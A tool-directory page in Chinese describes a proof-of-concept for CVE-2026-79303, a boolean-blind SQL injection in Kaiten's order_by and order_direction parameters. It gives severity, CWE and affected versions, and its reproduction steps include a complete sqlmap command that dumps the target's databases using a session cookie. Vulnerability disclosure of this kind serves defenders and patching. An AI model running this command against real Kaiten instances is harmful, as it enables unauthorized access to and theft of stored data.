Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-79303 — CVE-2026-79303 的概念验证,这是 Kaiten 中影响 `order_by` 和 `order_direction` 参数的一个严重布尔盲注 SQL 注入漏洞,包含复现步骤和 CVSS 9.9 的详细信息。 | Kitploit
工具/GitHubGitHub/4ybrick/cve-2026-79303
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHub4ybrick/cve-2026-79303

CVE-2026-79303

CVE-2026-79303 的概念验证,这是 Kaiten 中影响 `order_by` 和 `order_direction` 参数的一个严重布尔盲注 SQL 注入漏洞,包含复现步骤和 CVSS 9.9 的详细信息。

查看仓库
17小时35分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-79303

布尔型盲注(Boolean-blind SQL injection)

描述:动态 SQL 语句的生成未进行必要的数据验证,也未使用参数化语句或存储过程。

影响:SQL 注入(SQLi)

CVSSv3.1 向量:AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H(9.9 严重)

CWE:CWE-89:SQL 命令中特殊元素中和不当('SQL 注入')

受影响组件:GET 参数 order_by 和 order_direction

厂商:kaiten

受影响产品

  • kaiten 版本:57.192.20 < 57.214.26

复现步骤:

  1. sqlmap -u "https://[kaiten ip]/api/cards?version=2&limit=51&query=1&order_by=1&order_direction=desc&search_fields=title" --cookie="connect.sid=[value]" -p 'order_by' --technique B --level 5 --dbms postgresql --dbs --dump
  2. 输入 n(不将你的 cookie 与新 cookie 合并)-> C
Уязвимый параметр

发现者

  • Danil Belov

参考

  • https://nvd.nist.gov/vuln/detail/CVE-2026-79303
  • https://bdu.fstec.ru/vul/2025-02933
  • https://kaiten.ru/
下载工具